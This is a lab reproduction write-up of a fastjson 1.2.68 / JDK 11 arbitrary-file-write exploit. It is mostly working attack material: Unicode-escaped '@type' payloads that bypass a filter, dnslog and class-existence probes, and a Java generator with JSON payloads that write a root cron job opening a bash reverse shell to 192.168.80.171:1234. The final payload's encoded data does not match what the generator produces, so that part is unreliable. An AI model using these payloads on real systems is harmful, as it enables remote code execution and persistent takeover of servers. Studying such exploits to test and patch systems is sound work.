Reference: https://github.com/lemono0/FastJsonPart
The main focus is on reproducing the process in order to understand the exploitation flow. There are many well-written articles by experts online, but they are thin on the basics (how to compile Java files in IDEA, how to resolve dependency issues, and so on -__-|), so I am documenting my own reproduction process.
07-1268-jkd11-writefile
Capture the request, strip the brackets, and determine the fastjson version.
A dnslog probe of fastjson shows the payload is being filtered.
Unicode-encode @type to bypass the filter:
{
"\u0040\u0074\u0079\u0070\u0065": "java.net.InetSocketAddress" {
"address": ,
"val": "1bdmkeljntnmdy5h5nf3h571tszjn9by.oastify.com"
}
}
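The \uXXXX escapes in the key above decode back to the literal string "@type", which is why a plain-text filter on "@type" misses them. A minimal sketch (the decoder helper is hypothetical, not part of the exploit):

```java
public class UnicodeKey {
    // Decode a run of \uXXXX escapes into the characters they represent,
    // as a JSON parser would when reading the payload key
    public static String decode(String escaped) {
        StringBuilder sb = new StringBuilder();
        for (String hex : escaped.split("\\\\u")) {
            if (!hex.isEmpty()) {
                sb.append((char) Integer.parseInt(hex, 16));
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // The key used in the probe payload
        System.out.println(decode("\\u0040\\u0074\\u0079\\u0070\\u0065")); // @type
    }
}
```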
The dnslog request is received, confirming fastjson. Next, probe the version:
{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"
Probe dependencies.
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "java.net.http.HttpClient"
}
}
A "can not cast to char" response indicates that java.net.http.HttpClient is present, which means the target runs JDK 11.
org.springframework.web.bind.annotation.RequestMapping is a Spring framework class, so the target is a SpringBoot environment. Probe for it the same way:
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
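The probes above discriminate on class resolution: fastjson resolves the "val" of a java.lang.Class node with a class lookup, so the "can not cast to char" error only appears when the named class actually exists on the target. A rough local analogy of that check (the real lookup happens inside fastjson on the server):

```java
public class DependencyProbe {
    // Returns true when the named class can be resolved on this JVM
    public static boolean present(String className) {
        try {
            Class.forName(className, false, DependencyProbe.class.getClassLoader());
            return true;  // class resolvable -> the probe errors with "can not cast to char"
        } catch (ClassNotFoundException e) {
            return false; // class missing -> a different error path
        }
    }

    public static void main(String[] args) {
        System.out.println(present("java.lang.String"));        // true on any JVM
        System.out.println(present("com.example.NoSuchClass")); // false
    }
}
```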
With JDK 11 confirmed, unrestricted file writing is possible. A scheduled task is written to spawn a reverse shell.
Generate the exploit file, jdk11.java:
import com.alibaba.fastjson.JSON;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.Arrays;
import java.util.Base64;
import java.util.zip.Deflater;

public class jdk11 {
    // zlib-compress the cron entry and Base64-encode it; the target's
    // InflaterOutputStream decompresses it again before writing to the file
    public static String gzcompress(String code) {
        byte[] data = code.getBytes();
        byte[] output = new byte[0];
        Deflater compresser = new Deflater();
        compresser.reset();
        compresser.setInput(data);
        compresser.finish();
        ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
        try {
            byte[] buf = new byte[1024];
            while (!compresser.finished()) {
                int i = compresser.deflate(buf);
                bos.write(buf, 0, i);
            }
            output = bos.toByteArray();
        } catch (Exception e) {
            output = data;
            e.printStackTrace();
        } finally {
            try {
                bos.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        compresser.end();
        System.out.println(Arrays.toString(output));
        return Base64.getEncoder().encodeToString(output);
    }

    public static void main(String[] args) throws Exception {
        // cron entry: reverse shell every minute; the trailing \n is required
        String code = gzcompress("* * * * * bash -i >& /dev/tcp/192.168.80.171/1234 0>&1 \n");
        // works on fastjson <= 1.2.68 with JDK 11
        String payload = "{\r\n"
                + "  \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + "  \"@type\":\"sun.rmi.server.MarshalOutputStream\",\r\n"
                + "  \"out\":\r\n"
                + "  {\r\n"
                + "    \"@type\":\"java.util.zip.InflaterOutputStream\",\r\n"
                + "    \"out\":\r\n"
                + "    {\r\n"
                + "      \"@type\":\"java.io.FileOutputStream\",\r\n"
                + "      \"file\":\"/var/spool/cron/root\",\r\n"
                + "      \"append\":false\r\n"
                + "    },\r\n"
                + "    \"infl\":\r\n"
                + "    {\r\n"
                + "      \"input\":\r\n"
                + "      {\r\n"
                + "        \"array\":\"" + code + "\",\r\n"
                + "        \"limit\":1999\r\n"
                + "      }\r\n"
                + "    },\r\n"
                + "    \"bufLen\":1048576\r\n"
                + "  },\r\n"
                + "  \"protocolVersion\":1\r\n"
                + "}\r\n";
        System.out.println(payload);
        JSON.parseObject(payload);
    }
}
Generate payload.
Note: when writing the scheduled task, there are a few points to watch:
- The Linux distributions differ in where cron files live and how they are handled. Since the target is CentOS, the payload writes to the /var/spool/cron/root file. On Ubuntu, write to the system-level /etc/crontab instead of the /var/spool/cron/crontabs/root file, as the latter would require a permission change and a restart of the cron service.
- When writing a scheduled task through this file-write vulnerability, the command must end with a newline so that it forms a complete line; otherwise the reverse shell will not trigger.
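The newline requirement can be sketched as follows (the helper is hypothetical; cron silently ignores an incomplete last line, so the entry must terminate with \n):

```java
public class CronLine {
    // Build the cron entry written into /var/spool/cron/root;
    // the trailing \n makes it a complete line that cron will execute
    public static String build(String ip, int port) {
        return "* * * * * bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1 \n";
    }

    public static void main(String[] args) {
        String line = build("192.168.80.171", 1234);
        System.out.println(line.endsWith("\n")); // true
    }
}
```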
{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
"\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
"file":"/var/spool/cron/root",
"append":false
},
"infl":
{
"input":
{
"array":"eJzTUtCCQoWkxOIMBd1MBTs1Bf2U1DL9kuQCfUNLIz1DMws9CwM9Q3NDfUMjYxMFAzs1QwUuAHKnDGw=",
"limit":1999
}
},
"bufLen":1048576
},
"protocolVersion":1
}
The limit must be the actual length of the data written to the file, which may differ from the length of the cron command because of the compression. This is again determined through error handling: first set the limit as large as possible; fastjson then throws an error that discloses the correct data offset, 59 here, so 59 is the actual data length.
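The length can also be sanity-checked offline: the Base64 "array" value from the first attempt decodes to exactly 59 bytes, matching the offset fastjson leaked in its error message. A small sketch:

```java
import java.util.Base64;

public class PayloadLength {
    // Length of the raw bytes behind a Base64-encoded "array" value
    public static int decodedLength(String b64) {
        return Base64.getDecoder().decode(b64).length;
    }

    public static void main(String[] args) {
        // "array" value from the limit:1999 payload above
        String array = "eJzTUtCCQoWkxOIMBd1MBTs1Bf2U1DL9kuQCfUNLIz1DMws9CwM9Q3NDfUMjYxMFAzs1QwUuAHKnDGw=";
        System.out.println(decodedLength(array)); // 59
    }
}
```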
{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
"\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
"file":"/var/spool/cron/root",
"append":false
},
"infl":
{
"input":
{
"array":"H4sIAAAAAAAAANNS0IJChaTE4gwF3UwFOzUF/ZTUMv2S5AJ9Q0sjPUMzCz0LAz1Dc0N9QyNjEwUDOzVDBS4AGWjIeTkAAAA=",
"limit":59
}
},
"bufLen":1048576
},
"protocolVersion":1
}
The reverse shell is triggered.